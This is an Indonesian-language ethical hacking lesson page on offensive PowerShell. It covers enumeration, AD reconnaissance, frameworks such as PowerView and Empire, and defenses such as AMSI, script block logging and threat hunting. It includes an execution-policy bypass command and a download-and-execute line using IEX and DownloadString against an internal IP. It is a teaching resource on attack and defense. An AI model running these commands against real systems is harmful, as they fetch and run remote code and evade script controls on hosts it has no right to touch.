0Pricing
Ethical Hacking Academy · Pelajaran

PowerShell untuk Penyerang

PowerShell ofensif

PowerShell untuk Penyerang adalah pelajaran Ethical Hacking Academy gratis di CoddyKit. Ini adalah pelajaran 4 dari 4. Kamu bisa membaca pelajaran lengkapnya di bawah secara gratis — lalu praktikkan langsung di browser dengan editor kode bawaan dan tutor AI 24/7. Ini adalah bagian dari jalur belajar Ethical Hacking Academy, dan progresmu tersinkronisasi di web dan aplikasi CoddyKit. Kursus Ethical Hacking Academy mencakup 4 pelajaran total.

Mengapa PowerShell

PowerShell sudah terintegrasi dalam Windows, terhubung erat dengan OS dan .NET, serta dipercaya oleh administrator. Karena itu, PowerShell menjadi alat living-off-the-land favorit penyerang—tanpa perlu menaruh malware.

Pelajaran ini membahas konsep PowerShell ofensif yang harus Anda pahami untuk menyerang dan mempertahankan Windows.

Cmdlet dan Pipeline

Perintah PowerShell berbentuk cmdlet dengan format Kata Kerja-Kata Benda. Perintah tersebut meneruskan objek yang kaya informasi, bukan sekadar teks, melalui pipeline sehingga enumerasi menjadi efektif.

Get-Process | Where-Object { $_.CPU -gt 10 } | Select-Object Name, Id

Enumerasi Sistem

Penyerang menggunakan cmdlet bawaan untuk memeriksa host dengan cepat—pengguna, layanan, jaringan, dan tambalan.

Get-LocalUser
Get-Service | Where-Object Status -eq 'Running'
Get-NetTCPConnection -State Listen

Kebijakan Eksekusi Bukan Keamanan

Kebijakan eksekusi membatasi eksekusi file skrip, tetapi bukan merupakan batas keamanan. Banyak opsi sederhana yang dapat melewatinya, sehingga pihak yang bertahan tidak boleh mengandalkannya.

powershell -ExecutionPolicy Bypass -File script.ps1

Mengunduh dan Menjalankan

Teknik yang umum digunakan adalah mengambil payload lalu menjalankannya di memori sehingga hanya sedikit jejak yang tertinggal di disk. Karena itu, pemantauan jaringan dan AMSI sangat penting.

IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/tool.ps1')

Perintah Terenkode

Opsi -EncodedCommand menjalankan PowerShell yang dikodekan dalam Base64, sering kali untuk menyamarkan maksud dari pemeriksaan biasa dan penyaring sederhana.

Pihak yang bertahan mendekode perintah tersebut dari log untuk mengungkap apa yang sebenarnya dijalankan.

powershell -EncodedCommand <base64-here>

Kerangka Kerja Ofensif

Perangkat bantu yang matang dibangun berdasarkan kemampuan dasar ini:

  • PowerSploit / PowerView—enumerasi AD dan pasca-eksploitasi.
  • Empire / Covenant—kendali dan komunikasi.
  • Nishang—skrip ofensif.

Saat ini, sebagian besar telah sangat mudah dikenali oleh pertahanan.

Reconnaissance Active Directory

Dalam sebuah domain, PowerShell (PowerView atau modul AD) memetakan pengguna, grup, dan hubungan kepercayaan—dasar untuk menemukan jalur menuju Domain Admin.

Get-ADUser -Filter * -Properties LastLogonDate
Get-ADGroupMember 'Domain Admins'

AMSI dan Pencatatan

Microsoft menambahkan pertahanan khusus untuk penyalahgunaan PowerShell:

  • AMSI (Antarmuka Pemindaian Antimalware) memindai konten skrip sebelum eksekusi.
  • Pencatatan Blok Skrip merekam apa yang dijalankan.
  • Mode Bahasa Terbatas membatasi fitur berbahaya.

Penyerang berusaha melewati AMSI; pihak yang bertahan memantau log.

Perburuan Ancaman Defensif

Tim biru memburu PowerShell berbahaya dengan mencari:

  • Perintah yang dikodekan atau disamarkan.
  • Pengambilan melalui jaringan menggunakan DownloadString / IEX.
  • Proses induk yang tidak biasa (Office menjalankan PowerShell).
  • Log blok skrip AMSI dan ID Peristiwa 4104.

Gunakan Secara Etis

Teknik ini sangat kuat dan secara langsung mencerminkan intrusi nyata. Jalankan hanya di lab Anda sendiri atau dengan izin tertulis yang jelas.

Berlatih dari sisi defensif—membaca log dan mengenali temuan AMSI—sama berharganya dengan mempelajari sisi ofensif.

Pemeriksaan Singkat

Evaluasilah kebijakan eksekusi sebagai suatu kontrol.

Ringkasan

Anda telah mempelajari PowerShell ofensif:

  • Cmdlet berbasis objek membuat enumerasi menjadi efektif dan tersamar (living-off-the-land).
  • Pengunduhan dan eksekusi, perintah terenkripsi, serta kerangka kerja seperti PowerView/Empire.
  • Kebijakan eksekusi bukan keamanan; AMSI dan pencatatan blok skrip adalah pertahanan yang sebenarnya.
  • Selalu bertindak secara etis dan pelajari sisi defensifnya.

Dengan ini, kursus Windows Internals selesai.

Pertanyaan yang Sering Diajukan

Apakah pelajaran “PowerShell untuk Penyerang” gratis?

Ya — teks lengkap “PowerShell untuk Penyerang” gratis dibaca di sini di web. Untuk praktiknya secara interaktif (editor kode bawaan dan tutor AI 24/7) dan buka sisa kursus Ethical Hacking Academy, upgrade ke CoddyKit PRO. Kursus Ethical Hacking Academy mencakup 4 pelajaran total.

Apa yang akan aku pelajari di “PowerShell untuk Penyerang”?

PowerShell ofensif Kamu berlatih Ethical Hacking Academy dengan kode praktik yang langsung kamu jalankan di browser, dan tutor AI 24/7 menjawab pertanyaanmu saat kamu mengerjakan pelajaran ini.

Apakah aku perlu pengalaman untuk memulai Ethical Hacking Academy?

Tidak diperlukan pengalaman sebelumnya. Ethical Hacking Academy di CoddyKit dirancang untuk pemula hingga pelajar tingkat lanjut, jadi kamu bisa memulai di sini atau dari awal dan belajar sesuai kecepatan kamu sendiri. Ini adalah pelajaran 4 dari 4.

Berapa lama pelajaran “PowerShell untuk Penyerang” memakan waktu?

Sebagian besar pelajaran CoddyKit memakan waktu sekitar 5–10 menit. Setiap pelajaran ringkas dan interaktif, jadi kamu membuat kemajuan stabil dan melanjutkan dari tempat kamu tinggalkan di web dan aplikasi.

Bisakah aku menulis dan menjalankan kode dalam pelajaran Ethical Hacking Academy ini?

Ya. Setiap pelajaran Ethical Hacking Academy menyertakan editor kode bawaan, jadi kamu menulis dan menjalankan kode nyata langsung di browser dan mendapatkan umpan balik AI instan — tidak diperlukan penyiapan lokal.

Semua pelajaran dalam kursus ini

  1. Arsitektur Windows
  2. Registry
  3. Autentikasi Windows
  4. PowerShell untuk Penyerang
← Kembali ke Ethical Hacking Academy